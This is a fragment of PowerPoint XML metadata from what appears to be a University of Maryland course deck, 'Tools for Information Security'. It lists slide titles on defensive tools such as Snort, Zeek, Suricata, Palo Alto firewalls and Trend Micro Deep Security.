      <vt:lpstr>Running Snort – .pcap</vt:lpstr>
      <vt:lpstr>Running Snort – .pcap – Why?</vt:lpstr>
      <vt:lpstr>Snort Exercise</vt:lpstr>
      <vt:lpstr>What to do with snort alerts?</vt:lpstr>
      <vt:lpstr>BASE – Basic Analysis &amp; Security Engine</vt:lpstr>
      <vt:lpstr>BASE</vt:lpstr>
      <vt:lpstr>OSSIM</vt:lpstr>
      <vt:lpstr>Squil</vt:lpstr>
      <vt:lpstr>Snorby</vt:lpstr>
      <vt:lpstr>Squert</vt:lpstr>
      <vt:lpstr>PulledPork</vt:lpstr>
      <vt:lpstr>Where to get rules?</vt:lpstr>
      <vt:lpstr>Oinkcode? </vt:lpstr>
      <vt:lpstr>Barnyard2</vt:lpstr>
      <vt:lpstr>Suricata</vt:lpstr>
      <vt:lpstr>Zeek</vt:lpstr>
      <vt:lpstr>But I have an IPS?</vt:lpstr>
      <vt:lpstr>Zeek - Components</vt:lpstr>
      <vt:lpstr>Zeek</vt:lpstr>
      <vt:lpstr>Zeek - Scripts</vt:lpstr>
      <vt:lpstr>Zeek - Scripts</vt:lpstr>
      <vt:lpstr>Zeek</vt:lpstr>
      <vt:lpstr>Zeek</vt:lpstr>
      <vt:lpstr>Zeek – DNS less –S dns.org</vt:lpstr>
      <vt:lpstr>Zeek</vt:lpstr>
      <vt:lpstr>zeek-cut</vt:lpstr>
      <vt:lpstr>Zeek Exercise</vt:lpstr>
      <vt:lpstr>Next-Gen FWs, Unified Threat Mgmt</vt:lpstr>
      <vt:lpstr>The NGFW/UTM Market</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>Palo Alto</vt:lpstr>
      <vt:lpstr>Palo Alto </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Trend Micro Deep Security</vt:lpstr>
      <vt:lpstr>Trend Micro Deep Security</vt:lpstr>
      <vt:lpstr>Trend Micro Deep Security</vt:lpstr>
      <vt:lpstr>Trend Micro Deep Security</vt:lpstr>
      <vt:lpstr>Trend Micro Deep Security</vt:lpstr>
      <vt:lpstr>Antimalware</vt:lpstr>
      <vt:lpstr> </vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Trends in Threat Prevention</vt:lpstr>
      <vt:lpstr>Trends in threat prevention</vt:lpstr>
      <vt:lpstr>Remember</vt:lpstr>
      <vt:lpstr>HW #6</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Company>University of Maryland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Tools for Information Security</dc:title>
  <dc:creator>Kevin Shivers</dc:creator>
  <cp:lastModifiedBy>Microsoft Office User</cp:lastModifiedBy>
  <cp:revision>348</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-06-19T02:29:32Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-04-01T17:04:06Z</dcterms:modified>
</cp:coreProperties>
</file>